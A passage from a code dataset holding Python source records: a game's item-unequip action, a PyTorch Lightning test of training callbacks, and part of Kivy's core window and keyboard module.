\"\"\"\n Factory for creating unequip actions\n\n .. versionadded:: 0.8\n \"\"\"\n @log_debug\n def __init__(self):\n \"\"\"\n Constructor for this factory\n \"\"\"\n super().__init__()\n self.sub_action = 'unequip'\n\n @log_debug\n def can_handle(self, parameters):\n \"\"\"\n Can this factory process these parameters\n\n :param parameters: parameters to check\n :returns: True if factory is capable of handling parameters\n :rtype: Boolean\n \"\"\"\n return self.sub_action == parameters.sub_action\n\n @log_info\n def get_action(self, parameters):\n \"\"\"\n Create an unequip action\n\n :param parameters: parameters used to control creation\n :type parameters: InventoryParameters\n \"\"\"\n return UnEquipAction(parameters.character, parameters.item)\n\n\nclass UnEquipAction():\n \"\"\"\n Action for unequiping an item\n\n .. versionadded:: 0.8\n \"\"\"\n @log_debug\n def __init__(self, character, item):\n \"\"\"\n Default constructor\n\n :param character: character wearing the item\n :type character: Character\n :param item: item to unequip\n :type item: Item\n \"\"\"\n super().__init__()\n\n self.character = character\n self.item = item\n\n @log_info\n def execute(self):\n \"\"\"\n Executes this action\n \"\"\"\n if is_armour(self.item):\n self.character.inventory.armour = None\n self.character.raise_event(new_unequip_event(self.character,\n self.item))\n if is_weapon(self.item):\n self.character.inventory.weapon = None\n self.character.raise_event(new_unequip_event(self.character,\n self.item))\n\n if is_boots(self.item):\n self.character.inventory.boots = None\n self.character.raise_event(new_unequip_event(self.character,\n self.item))\n\n @log_debug\n def is_legal(self):\n \"\"\"\n Check if the action is possible to perform\n\n :returns: True if move is possible, false otherwise\n :rtype: Boolean\n \"\"\"\n return True\n"} {"ext": "py", "sha": "1a2ecae7b94c0b648c258f3ae55cf4ff0371822d", "content": "# Copyright The PyTorch Lightning team.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport pytest\n\nfrom pytorch_lightning import Callback, Trainer\nfrom tests.helpers.boring_model import BoringModel\n\n\n@pytest.mark.parametrize(\"single_cb\", [False, True])\ndef test_train_step_no_return(tmpdir, single_cb: bool):\n \"\"\"\n Tests that only training_step can be used\n \"\"\"\n\n class CB(Callback):\n def on_train_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n assert \"loss\" in outputs\n\n def on_validation_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n assert \"x\" in outputs\n\n def on_test_batch_end(self, trainer, pl_module, outputs, batch, batch_idx, dataloader_idx):\n assert \"x\" in outputs\n\n class TestModel(BoringModel):\n def on_train_batch_end(self, outputs, batch, batch_idx: int, dataloader_idx: int) -> None:\n assert \"loss\" in outputs\n\n def on_validation_batch_end(self, outputs, batch, batch_idx: int, dataloader_idx: int) -> None:\n assert \"x\" in outputs\n\n def on_test_batch_end(self, outputs, batch, batch_idx: int, dataloader_idx: int) -> None:\n assert \"x\" in outputs\n\n def training_epoch_end(self, outputs) -> None:\n assert len(outputs) == self.trainer.num_training_batches\n\n model = TestModel()\n\n trainer = Trainer(\n callbacks=CB() if single_cb else [CB()],\n default_root_dir=tmpdir,\n limit_train_batches=2,\n limit_val_batches=2,\n max_epochs=1,\n log_every_n_steps=1,\n weights_summary=None,\n )\n\n assert any(isinstance(c, CB) for c in trainer.callbacks)\n\n trainer.fit(model)\n\n\ndef test_free_memory_on_eval_outputs(tmpdir):\n class CB(Callback):\n def on_epoch_end(self, trainer, pl_module):\n assert len(trainer._evaluation_loop.outputs) == 0\n\n model = BoringModel()\n\n trainer = Trainer(\n callbacks=CB(),\n default_root_dir=tmpdir,\n limit_train_batches=2,\n limit_val_batches=2,\n max_epochs=1,\n weights_summary=None,\n )\n\n trainer.fit(model)\n"} {"ext": "py", "sha": "1a2ecb255b4155ad265b3f3067fad5454f01a1b3", "content": "# pylint: disable=W0611\n# coding: utf-8\n'''\nWindow\n======\n\nCore class for creating the default Kivy window. Kivy supports only one window\nper application: please don't try to create more than one.\n'''\n\n__all__ = ('Keyboard', 'WindowBase', 'Window')\n\nfrom os.path import join, exists\nfrom os import getcwd\n\nfrom kivy.core import core_select_lib\nfrom kivy.clock import Clock\nfrom kivy.config import Config\nfrom kivy.logger import Logger\nfrom kivy.base import EventLoop, stopTouchApp\nfrom kivy.modules import Modules\nfrom kivy.event import EventDispatcher\nfrom kivy.properties import ListProperty, ObjectProperty, AliasProperty, \\\n NumericProperty, OptionProperty, StringProperty, BooleanProperty\nfrom kivy.utils import platform, reify\nfrom kivy.context import get_current_context\nfrom kivy.uix.behaviors import FocusBehavior\nfrom kivy.setupconfig import USE_SDL2\nfrom kivy.graphics.transformation import Matrix\n\n# late import\nVKeyboard = None\nandroid = None\n\n\nclass Keyboard(EventDispatcher):\n '''Keyboard interface that is returned by\n :meth:`WindowBase.request_keyboard`. When you request a keyboard,\n you'll get an instance of this class. Whatever the keyboard input is\n (system or virtual keyboard), you'll receive events through this\n instance.\n\n :Events:\n `on_key_down`: keycode, text, modifiers\n Fired when a new key is pressed down\n `on_key_up`: keycode\n Fired when a key is released (up)\n\n Here is an example of how to request a Keyboard in accordance with the\n current configuration:\n\n .. include:: ../../examples/widgets/keyboardlistener.py\n :literal:\n\n '''\n\n # Keycodes mapping, between str <-> int. These keycodes are\n # currently taken from pygame.key. But when a new provider will be\n # used, it must do the translation to these keycodes too.\n keycodes = {\n # specials keys\n 'backspace': 8, 'tab': 9, 'enter': 13, 'rshift': 303, 'shift': 304,\n 'alt': 308, 'rctrl': 306, 'lctrl': 305,\n 'super': 309, 'alt-gr': 307, 'compose': 311, 'pipe': 310,\n 'capslock': 301, 'escape': 27, 'spacebar': 32, 'pageup': 280,\n 'pagedown': 281, 'end': 279, 'home': 278, 'left': 276, 'up':\n 273, 'right': 275, 'down': 274, 'insert': 277, 'delete': 127,\n 'numlock': 300, 'print': 144, 'screenlock': 145, 'pause': 19,\n\n # a-z keys\n 'a': 97, 'b': 98, 'c': 99, 'd': 100, 'e': 101, 'f': 102, 'g': 103,\n 'h': 104, 'i': 105, 'j': 106, 'k': 107, 'l': 108, 'm': 109, 'n': 110,\n 'o': 111, 'p': 112, 'q': 113, 'r': 114, 's': 115, 't': 116, 'u': 117,\n 'v': 118, 'w': 119, 'x': 120, 'y': 121, 'z': 122,\n\n # 0-9 keys\n '0': 48, '1': 49, '2': 50, '3': 51, '4': 52,\n '5': 53, '6': 54, '7': 55, '8': 56, '9': 57,\n\n # numpad\n 'numpad0': 256, 'numpad1': 257, 'numpad2': 258, 'numpad3': 259,\n 'numpad4': 260, 'numpad5': 261, 'numpad6': 262, 'numpad7': 263,\n 'numpad8': 264, 'numpad9': 265, 'numpaddecimal': 266,\n 'numpaddivide': 267, 'numpadmul': 268, 'numpadsubstract': 269,\n 'numpadadd': 270, 'numpadenter': 271,\n\n # F1-15\n 'f1': 282, 'f2': 283, 'f3': 284, 'f4': 285, 'f5': 286, 'f6': 287,\n 'f7': 288, 'f8': 289, 'f9': 290, 'f10': 291, 'f11': 292, 'f12': 293,\n 'f13': 294, 'f14': 295, 'f15': 296,\n\n # other keys\n '(': 40, ')': 41,\n '[': 91, ']': 93,\n '{': 123, '}': 125,\n ':': 59, ';': 59,\n '=': 61, '+': 43,\n '-': 45, '_': 95,\n '/': 47, '*': 42,\n '?': 47,\n '`': 96, '~': 126,\n '´': 180, '¦': 166,\n '\\\\': 92, '|': 124,\n '\"': 34, \"'\": 39,\n ',': 44, '.': 46,\n '<': 60, '>': 62,\n '@': 64, '!': 33,\n '#': 35, '$': 36,\n '%': 37, '^': 94,\n '&': 38, '¬': 172,\n '¨': 168, '…': 8230,\n 'ù': 249, 'à': 224,\n 'é': 233, 'è': 232,\n }\n\n __events__ = ('on_key_down', 'on_key_up', 'on_textinput')\n\n def __init__(self, **kwargs):\n super(Keyboard, self).__init__()\n\n #: Window which the keyboard is attached too\n self.window = kwargs.get('window', None)\n\n #: Callback that will be called when the keyboard is released\n self.callback = kwargs.get('callback', None)\n\n #: Target that have requested the keyboard\n self.target = kwargs.get('target', None)\n\n #: VKeyboard widget, if allowed by the configuration\n self.widget = kwargs.get('widget', None)\n\n def on_key_down(self, keycode, text, modifiers):\n pass\n\n def on_key_up(self, keycode):\n pass\n\n def on_textinput(self, text):\n pass\n\n def release(self):\n '''Call this method to release the current keyboard.\n This will ensure that the keyboard is no longer attached to your\n callback.'''\n if self.window:\n self.window.release_keyboard(self.target)\n\n def _on_window_textinput(self, instance, text):\n return self.dispatch('on_textinput', text)\n\n def _on_window_key_down(self, instance, keycode, scancode, text,\n modifiers):\n keycode = (keycode, self.keycode_to_string(keycode))\n if text == '\\x04':\n Window.trigger_keyboard_height()\n return\n return self.dispatch('on_key_down', keycode, text, modifiers)\n\n def _on_window_key_up(self, instance, keycode, *largs):\n keycode = (keycode, self.keycode_to_string(keycode))\n return self.dispatch('on_key_up', keycode)\n\n def _on_vkeyboard_key_down(self, instance, keycode, text, modifiers):\n if keycode is None:\n keycode = text.lower()\n keycode = (self.string_to_keycode(keycode), keycode)\n return self.dispatch('on_key_down', keycode, text, modifiers)\n\n def _on_vkeyboard_key_up(self, instance, keycode, text, modifiers):\n if keycode is None:\n keycode = text\n keycode = (self.string_to_keycode(keycode), keycode)\n return self.dispatch('on_key_up', keycode)\n\n def _on_vkeyboard_textinput(self, instance, text):\n return self.dispatch('on_textinput', text)\n\n def string_to_keycode(self, value):\n '''Convert a string to a keycode number according to the\n :attr:`Keyboard.keycodes`. If the value is not found in the\n keycodes, it will return -1.\n '''\n return Keyboard.keycodes.get(value, -1)\n\n def keycode_to_string(self, value):\n '''Convert a keycode number to a string according to the\n :attr:`Keyboard.keycodes`. If the value is not found in the\n keycodes, it will return ''.\n '''\n keycodes = list(Keyboard.keycodes.values())\n if value in keycodes:\n return list(Keyboard.keycodes.keys())[keycodes.index(value)]\n return ''\n\n\nclass WindowBase(EventDispatcher):\n '''WindowBase is an abstract window widget for any window implementation.\n\n :Parameters:\n `borderless`: str, one of ('0', '1')\n Set the window border state. Check the\n :mod:`~kivy.config` documentation for a\n more detailed explanation on the values.\n `fullscreen`: str, one of ('0', '1', 'auto', 'fake')\n Make the window fullscreen. Check the\n :mod:`~kivy.config` documentation for a\n more detailed explanation on the values.\n `width`: int\n Width of the window.\n `height`: int\n Height of the window.\n\n :Events:\n `on_motion`: etype, motionevent\n Fired when a new :class:`~kivy.input.motionevent.MotionEvent` is\n dispatched\n `on_touch_down`:\n Fired when a new touch event is initiated.\n `on_touch_move`:\n Fired when an existing touch event changes location.\n `on_touch_up`:\n Fired when an existing touch event is terminated.\n `on_draw`:\n Fired when the :class:`Window` is being drawn.\n `on_flip`:\n Fired when the :class:`Window` GL surface is being flipped.\n `on_rotate`: rotation\n Fired when the :class:`Window` is being rotated.\n `on_close`:\n Fired when the :class:`Window` is closed.\n `on_request_close`:\n Fired when the event loop wants to close the window, or if the\n escape key is pressed and `exit_on_escape` is `True`. If a function\n bound to this event returns `True`, the window will not be closed.\n If the the event is triggered because of the keyboard escape key,\n the keyword argument `source` is dispatched along with a value of\n `keyboard` to the bound functions.\n\n .. versionadded:: 1.9.0\n\n `on_keyboard`: key, scancode, codepoint, modifier\n Fired when the keyboard is used for input.\n\n .. versionchanged:: 1.3.0\n The *unicode* parameter has been deprecated in favor of\n codepoint, and will be removed completely in future versions.\n\n `on_key_down`: key, scancode, codepoint\n Fired when a key pressed.\n\n .. versionchanged:: 1.3.0\n The *unicode* parameter has been deprecated in favor of\n codepoint, and will be removed completely in future versions.\n\n `on_key_up`: key, scancode, codepoint\n Fired when a key is released.\n\n .. versionchanged:: 1.3.0\n The *unicode* parameter has be deprecated in favor of\n codepoint, and will be removed completely in future versions.\n\n `on_dropfile`: str\n Fired when a file is dropped on the application.\n\n '''\n\n __instance = None\n __initialized = False\n _fake_fullscreen = False\n _density = 1\n\n # private properties\n _size = ListProperty([0, 0])\n _modifiers = ListProperty([])\n _rotation = NumericProperty(0)\n _clearcolor = ObjectProperty([0, 0, 0, 1])\n\n children = ListProperty([])\n '''List of the children of this window.\n\n :attr:`children` is a :class:`~kivy.properties.ListProperty` instance and\n defaults to an empty list.\n\n Use :meth:`add_widget` and :meth:`remove_widget` to manipulate the list of\n children. Don't manipulate the list directly unless you know what you are\n doing.\n '''\n\n parent = ObjectProperty(None, allownone=True)\n '''Parent of this window.\n\n :attr:`parent` is a :class:`~kivy.properties.ObjectProperty` instance and\n defaults to None. When created, the parent is set to the window itself.\n You must take care of it if you are doing a recursive check.\n '''\n\n icon = StringProperty()\n\n def _get_modifiers(self):\n return self._modifiers\n\n modifiers = AliasProperty(_get_modifiers, None)\n '''List of keyboard modifiers currently active.\n '''\n\n def _get_size(self):\n r = self._rotation\n w, h = self._size\n if self._density != 1:\n w, h = self._win._get_gl_size()\n if self.softinput_mode == 'resize':\n h -= self.keyboard_height\n if r in (0, 180):\n return w, h\n return h, w\n\n def _set_size(self, size):\n if self._size != size:\n r = self._rotation\n if r in (0, 180):\n self._size = size\n else:\n self._size = size[1], size[0]\n\n self.dispatch('on_resize', *size)\n return True\n else:\n return False\n\n size = AliasProperty(_get_size, _set_size, bind=('_size', ))\n '''Get the rotated size of the window. If :attr:`rotation` is set, then the\n size will change to reflect the rotation.\n '''\n\n def _get_clearcolor(self):\n return self._clearcolor\n\n def _set_clearcolor(self, value):\n if value is not None:\n if type(value) not in (list, tuple):\n raise Exception('Clearcolor must be a list or tuple')\n if len(value) != 4:\n raise Exception('Clearcolor must contain 4 values')\n self._clearcolor = value\n\n clearcolor = AliasProperty(_get_clearcolor, _set_clearcolor,\n bind=('_clearcolor', ))\n '''Color used to clear the window.\n\n ::\n\n from kivy.core.window import Window\n\n # red background color\n Window.clearcolor = (1, 0, 0, 1)\n\n # don't clear background at all\n Window.clearcolor = None\n\n .. versionchanged:: 1.7.2\n The clearcolor default value is now: (0, 0, 0, 1).\n\n '''\n\n # make some property read-only\n def _get_width(self):\n _size = self._size\n if self._density != 1:\n _size = self._win._get_gl_size()\n r = self._rotation\n if r == 0 or r == 180:\n return _size[0]\n return _size[1]\n\n width = AliasProperty(_get_width, None, bind=('_rotation', '_size'))\n '''Rotated window width.\n\n :attr:`width` is a read-only :class:`~kivy.properties.AliasProperty`.\n '''\n\n def _get_height(self):\n '''Rotated window height'''\n r = self._rotation\n _size = self._size\n if self._density != 1:\n _size = self._win._get_gl_size()\n kb = self.keyboard_height if self.softinput_mode == 'resize' else 0\n if r == 0 or r == 180:\n return _size[1] - kb\n return _size[0] - kb\n\n height = AliasProperty(_get_height, None, bind=('_rotation', '_size'))\n '''Rotated window height.\n\n :attr:`height` is a read-only :class:`~kivy.properties.AliasProperty`.\n '''\n\n def _get_center(self):\n return self.width / 2., self.height / 2.\n\n center = AliasProperty(_get_center, None, bind=('width', 'height'))\n '''Center of the rotated window.\n\n :attr:`center` is a :class:`~kivy.properties.AliasProperty`.\n '''\n\n def _get_rotation(self):\n return self._rotation\n\n def _set_rotation(self, x):\n x = int(x % 360)\n if x == self._rotation:\n return\n if x not in (0, 90, 180, 270):\n raise ValueError('can rotate only 0, 90, 180, 270 degrees')\n self._rotation = x\n if self.initialized is False:\n return\n self.dispatch('on_resize', *self.size)\n self.dispatch('on_rotate', x)\n\n rotation = AliasProperty(_get_rotation, _set_rotation,\n bind=('_rotation', ))\n '''Get/set the window content rotation. Can be one of 0, 90, 180, 270\n degrees.\n '''\n\n softinput_mode = OptionProperty('', options=('', 'pan', 'scale', 'resize'))\n '''This specifies the behavior of window contents on display of soft\n keyboard on mobile platform. Can be one of '', 'pan', 'scale', 'resize'.\n\n When '' The main window is left as it is allowing the user to use\n :attr:`keyboard_height` to manage the window contents the way they want.\n\n when 'pan' The main window pans moving the bottom part of the window to be\n always on top of the keyboard.\n\n when 'resize' The window is resized and the contents scaled to fit the\n remaining space.\n\n .. versionadded:: 1.9.0\n\n :attr:`softinput_mode` is a :class:`OptionProperty` defaults to None.\n\n '''\n\n _keyboard_changed = BooleanProperty(False)\n\n def _upd_kbd_height(self, *kargs):\n self._keyboard_changed = not self._keyboard_changed\n\n def _get_ios_kheight(self):\n return 0\n\n def _get_android_kheight(self):\n global android\n if not android:\n import android\n return android.get_keyboard_height()\n\n def _get_kheight(self):\n if platform == 'android':\n return self._get_android_kheight()\n if platform == 'ios':\n return self._get_ios_kheight()\n return 0\n\n keyboard_height = AliasProperty(_get_kheight, None,\n bind=('_keyboard_changed',))\n '''Rerturns the height of the softkeyboard/IME on mobile platforms.\n Will return 0 if not on mobile platform or if IME is not active.\n\n .. versionadded:: 1.9.0\n\n :attr:`keyboard_height` is a read-only :class:`AliasProperty` defaults to 0.\n '''\n\n def _set_system_size(self, size):\n self._size = size\n\n def _get_system_size(self):\n if self.softinput_mode == 'resize':\n return self._size[0], self._size[1] - self.keyboard_height\n return self._size\n\n system_size = AliasProperty(\n _get_system_size,\n _set_system_size,\n bind=('_size', ))\n '''Real size of the window ignoring rotation.\n '''\n\n borderless = BooleanProperty(False)\n '''When set to True, this property removes the window border/decoration.\n\n .. versionadded:: 1.9.0\n\n :attr:`borderless` is a :class:`BooleanProperty`, defaults to False.\n '''\n\n fullscreen = OptionProperty(False, options=(True, False, 'auto', 'fake'))\n '''This property sets the fullscreen mode of the window. Available options\n are: True, False, 'auto', 'fake'. Check the :mod:`~kivy.config`\n documentation for a more detailed explanation on the values.\n\n .. versionadded:: 1.2.0\n\n .. note::\n The 'fake' option has been deprecated, use the :attr:`borderless`\n property instead.\n '''\n\n mouse_pos = ObjectProperty([0, 0])\n '''2d position of the mouse within the window.\n\n .. versionadded:: 1.2.0\n '''\n\n @property\n def __self__(self):\n return self\n\n top = NumericProperty(None, allownone=True)\n left = NumericProperty(None, allownone=True)\n position = OptionProperty('auto', options=['auto', 'custom'])\n render_context = ObjectProperty(None)\n canvas = ObjectProperty(None)\n title = StringProperty('Kivy')\n\n __events__ = (\n 'on_draw', 'on_flip', 'on_rotate', 'on_resize', 'on_close',\n 'on_motion', 'on_touch_down', 'on_touch_move', 'on_touch_up',\n 'on_mouse_down', 'on_mouse_move', 'on_mouse_up', 'on_keyboard',\n 'on_key_down', 'on_key_up', 'on_textinput', 'on_dropfile',\n 'on_request_close', 'on_joy_axis', 'on_joy_hat', 'on_joy_ball',\n 'on_joy_button_down', \"on_joy_button_up\")\n\n def __new__(cls, **kwargs):\n if cls.__instance is None:\n cls.__instance = EventDispatcher.__new__(cls)\n return cls.__instance\n\n def __init__(self, **kwargs):\n\n force = kwargs.pop('force', False)\n\n # don't init window 2 times,\n # except if force is specified\n if WindowBase.__instance is not None and not force:\n return\n\n self.initialized = False\n self._is_desktop = Config.getboolean('kivy', 'desktop')\n\n # create a trigger for update/create the window when one of window\n # property changes\n self.trigger_create_window = Clock.create_trigger(\n self.create_window, -1)\n\n # Create a trigger for updating the keyboard height\n self.trigger_keyboard_height = Clock.create_trigger(\n self._upd_kbd_height, .5)\n\n # set the default window parameter according to the configuration\n if 'borderless' not in kwargs:\n kwargs['borderless'] = Config.getboolean('graphics', 'borderless')\n if 'fullscreen' not in kwargs:\n fullscreen = Config.get('graphics', 'fullscreen')\n if fullscreen not in ('auto', 'fake'):\n fullscreen = fullscreen.lower() in ('true', '1', 'yes', 'yup')\n kwargs['fullscreen'] = fullscreen\n if 'width' not in kwargs:\n kwargs['width'] = Config.getint('graphics', 'width')\n if 'height' not in kwargs:\n kwargs['height'] = Config.getint('graphics', 'height')\n if 'rotation' not in kwargs:\n kwargs['rotation'] = Config.getint('graphics', 'rotation')\n if 'position' not in kwargs:\n kwargs['position'] = Config.getdefault('graphics', 'position',\n 'auto')\n if 'top' in kwargs:\n kwargs['position'] = 'custom'\n kwargs['top'] = kwargs['top']\n else:\n kwargs['top'] = Config.getint('graphics', 'top')\n if 'left' in kwargs:\n kwargs['position'] = 'custom'\n kwargs['left'] = kwargs['left']\n else:\n kwargs['left'] = Config.getint('graphics', 'left')\n kwargs['_size'] = (kwargs.pop('width'), kwargs.pop('height'))\n\n super(WindowBase, self).__init__(**kwargs)\n\n # bind all the properties that need to recreate the window\n self._bind_create_window()\n self.bind(size=self.trigger_keyboard_height,\n rotation=self.trigger_keyboard_height)\n\n self.bind(softinput_mode=lambda *dt: self.update_viewport(),\n keyboard_height=lambda *dt: self.update_viewport())\n\n # init privates\n self._system_keyboard = Keyboard(window=self)\n self._keyboards = {'system': self._system_keyboard}\n self._vkeyboard_cls = None\n\n self.children = []\n self.parent = self\n\n # before creating the window\n import kivy.core.gl # NOQA\n\n # configure the window\n self.create_window()\n\n # attach modules + listener event\n EventLoop.set_window(self)\n Modules.register_window(self)\n EventLoop.add_event_listener(self)\n\n # manage keyboard(s)\n self.configure_keyboards()\n\n # assign the default context of the widget creation\n if not hasattr(self, '_context'):\n self._context = get_current_context()\n\n # mark as initialized\n self.initialized = True\n\n def _bind_create_window(self):\n for prop in (\n 'fullscreen', 'borderless', 'position', 'top',\n 'left', '_size', 'system_size'):\n self.bind(**{prop: self.trigger_create_window})\n\n def _unbind_create_window(self):\n for prop in (\n 'fullscreen', 'borderless', 'position', 'top',\n 'left', '_size', 'system_size'):\n self.unbind(**{prop: self.trigger_create_window})\n\n def toggle_fullscreen(self):\n '''Toggle between fullscreen and windowed mode.\n\n .. deprecated:: 1.9.0\n Use :attr:`fullscreen` instead.\n '''\n pass\n\n def maximize(self):\n '''Maximizes the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: maximize() is not implemented in the current '\n 'window provider.')\n\n def minimize(self):\n '''Minimizes the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: minimize() is not implemented in the current '\n 'window provider.')\n\n def restore(self):\n '''Restores the size and position of a maximized or minimized window.\n This method should be used on desktop platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: restore() is not implemented in the current '\n 'window provider.')\n\n def hide(self):\n '''Hides the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: hide() is not implemented in the current '\n 'window provider.')\n\n def show(self):\n '''Shows the window. This method should be used on desktop\n platforms only.\n\n .. versionadded:: 1.9.0\n\n .. note::\n This feature requires a SDL2 window provider and is currently only\n supported on desktop platforms.\n\n .. warning::\n This code is still experimental, and its API may be subject to\n change in a future version.\n '''\n Logger.warning('Window: show() is not implemented in the current '\n 'window provider.')\n\n def close(self):\n '''Close the window'''\n pass\n\n def create_window(self, *largs):\n '''Will create the main window and configure it.\n\n .. warning::\n This method is called automatically at runtime. If you call it, it\n will recreate a RenderContext and Canvas. This means you'll have a\n new graphics tree, and the old one will be unusable.\n\n This method exist to permit the creation of a new OpenGL context\n AFTER closing the first one. (Like using runTouchApp() and\n stopTouchApp()).\n\n This method has only been tested in a unittest environment and\n is not suitable for Applications.\n\n Again, don't use this method unless you know exactly what you are\n doing!\n '''\n # just to be sure, if the trigger is set, and if this method is\n # manually called, unset the trigger\n Clock.unschedule(self.create_window)\n\n # ensure the window creation will not be called twice\n if platform in ('android', 'ios'):\n self._unbind_create_window()\n\n if not self.initialized:\n from kivy.core.gl import init_gl\n init_gl()\n\n # create the render context and canvas, only the first time.\n from kivy.graphics import RenderContext, Canvas\n self.render_context = RenderContext()\n self.canvas = Canvas()\n self.render_context.add(self.canvas)\n\n else:\n # if we get initialized more than once, then reload opengl state\n # after the second time.\n # XXX check how it's working on embed platform.\n if platform == 'linux' or Window.__class__.__name__ == 'WindowSDL':\n # on linux, it's safe for just sending a resize.\n self.dispatch('on_resize', *self.system_size)\n\n else:\n # on other platform, window are recreated, we need to reload.\n from kivy.graphics.context import get_context\n get_context().reload()\n Clock.schedule_once(lambda x: self.canvas.ask_update(), 0)\n self.dispatch('on_resize', *self.system_size)\n\n # ensure the gl viewport is correct\n self.update_viewport()\n\n def on_flip(self):\n '''Flip between buffers (event)'''\n self.flip()\n\n def flip(self):\n '''Flip between buffers'''\n pass\n\n def _update_childsize(self, instance, value):\n self.update_childsize([instance])\n\n def add_widget(self, widget, canvas=None):\n '''Add a widget to a window'''\n widget.parent = self\n self.children.insert(0, widget)\n canvas = self.canvas.before if canvas == 'before' else \\\n self.canvas.after if canvas == 'after' else self.canvas\n canvas.add(widget.canvas)\n self.update_childsize([widget])\n widget.bind(\n pos_hint=self._update_childsize,\n size_hint=self._update_childsize,\n size=self._update_childsize,\n pos=self._update_childsize)\n\n def remove_widget(self, widget):\n '''Remove a widget from a window\n '''\n if not widget in self.children:\n return\n self.children.remove(widget)\n if widget.canvas in self.canvas.children:\n self.canvas.remove(widget.canvas)\n elif widget.canvas in self.canvas.after.children:\n self.canvas.after.remove(widget.canvas)\n elif widget.canvas in self.canvas.before.children:\n self.canvas.before.remove(widget.canvas)\n widget.parent = None\n widget.unbind(\n pos_hint=self._update_childsize,\n size_hint=self._update_childsize,\n size=self._update_childsize,\n pos=self._update_childsize)\n\n def clear(self):\n '''Clear the window with the background color'''\n # XXX FIXME use late binding\n from kivy.graphics.opengl import glClearColor, glClear, \\\n GL_COLOR_BUFFER_BIT, GL_DEPTH_BUFFER_BIT, GL_STENCIL_BUFFER_BIT\n cc = self._clearcolor\n if cc is not None:\n glClearColor(*cc)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT |\n GL_STENCIL_BUFFER_BIT)\n\n def set_title(self, title):\n '''Set the window title.\n\n .. versionadded:: 1.0.5\n '''\n self.title = title\n\n def set_icon(self, filename):\n '''Set the icon of the window.\n\n .. versionadded:: 1.0.5\n '''\n self.icon = filename\n\n def to_widget(self, x, y, initial=True, relative=False):\n return (x, y)\n\n def to_window(self, x, y, initial=True, relative=False):\n return (x, y)\n\n def _apply_transform(self, m):\n return m\n\n def get_window_matrix(self, x=0, y=0):\n m = Matrix()\n m.translate(x, y, 0)\n return m\n\n def get_root_window(self):\n return self\n\n def get_parent_window(self):\n return self\n\n def get_parent_layout(self):\n return None\n\n def on_draw(self):\n self.clear()\n self.render_context.draw()\n\n def on_motion(self, etype, me):\n '''Event called when a Motion Event is received.\n\n :Parameters:\n `etype`: str\n One of 'begin', 'update', 'end'\n `me`: :class:`~kivy.input.motionevent.MotionEvent`\n The Motion Event currently dispatched.\n '''\n if me.is_touch:\n w, h = self.system_size\n if platform == 'ios' or self._density != 1:\n w, h = self.size\n me.scale_for_screen(w, h, rotation=self._rotation,\n smode=self.softinput_mode,\n kheight=self.keyboard_height)\n if etype == 'begin':\n self.dispatch('on_touch_down', me)\n elif etype == 'update':\n self.dispatch('on_touch_move', me)\n elif etype == 'end':\n self.dispatch('on_touch_up', me)\n FocusBehavior._handle_post_on_touch_up(me)\n\n def on_touch_down(self, touch):\n '''Event called when a touch down event is initiated.\n\n .. versionchanged:: 1.9.0\n The touch `pos` is now transformed to window coordinates before\n this method is called. Before, the touch `pos` coordinate would be\n `(0, 0)` when this method was called.\n '''\n for w in self.children[:]:\n if w.dispatch('on_touch_down', touch):\n return True\n\n def on_touch_move(self, touch):\n '''Event called when a touch event moves (changes location).\n\n .. versionchanged:: 1.9.0\n The touch `pos` is now transformed to window coordinates before\n this method is called. Before, the touch `pos` coordinate would be\n `(0, 0)` when this method was called.\n '''\n for w in self.children[:]:\n if w.dispatch('on_touch_move', touch):\n return True\n\n def on_touch_up(self, touch):\n '''Event called when a touch event is released (terminated).\n\n .. versionchanged:: 1.9.0\n The touch `pos` is now transformed to window coordinates before\n this method is called. Before, the touch `pos` coordinate would be\n `(0, 0)` when this method was called.\n '''\n for w in self.children[:]:\n if w.dispatch('on_touch_up', touch):\n return True\n\n def on_resize(self, width, height):\n '''Event called when the window is resized.'''\n self.update_viewport()\n\n def update_viewport(self):\n from kivy.graphics.opengl import glViewport\n from kivy.graphics.transformation import Matrix\n from math import radians\n\n w, h = self.system_size\n if self._density != 1:\n w, h = self.size\n\n smode = self.softinput_mode\n kheight = self.keyboard_height\n\n w2, h2 = w / 2., h / 2.\n r = radians(self.rotation)\n\n x, y = 0, 0\n _h = h\n if smode:\n y = kheight\n if smode == 'scale':\n _h -= kheight\n\n # prepare the viewport\n glViewport(x, y, w, _h)\n\n # do projection matrix\n projection_mat = Matrix()\n projection_mat.view_clip(0.0, w, 0.0, h, -1.0, 1.0, 0)\n self.render_context['projection_mat'] = projection_mat\n\n # do modelview matrix\n modelview_mat = Matrix().translate(w2, h2, 0)\n modelview_mat = modelview_mat.multiply(Matrix().rotate(r, 0, 0, 1))\n\n w, h = self.size\n w2, h2 = w / 2., h / 2.\n modelview_mat = modelview_mat.multiply(Matrix().translate(-w2, -h2, 0))\n self.render_context['modelview_mat'] = modelview_mat\n\n # redraw canvas\n self.canvas.ask_update()\n\n # and update childs\n self.update_childsize()\n\n def update_childsize(self, childs=None):\n width, height = self.size\n if childs is None:\n childs = self.children\n for w in childs:\n shw, shh = w.size_hint\n if shw and shh:\n w.size = shw * width, shh * height\n elif 